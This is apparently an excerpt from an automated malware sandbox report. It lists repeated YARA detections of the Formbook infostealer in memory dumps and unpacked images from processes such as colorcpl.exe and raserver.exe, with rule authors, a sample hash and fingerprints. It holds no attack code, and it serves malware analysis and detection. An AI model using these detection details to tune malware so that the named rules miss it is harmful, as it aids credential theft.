          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: 0321423605241625.exe PID: 3140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: colorcpl.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Mwqrxeuz.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: raserver.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0321423605241625.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
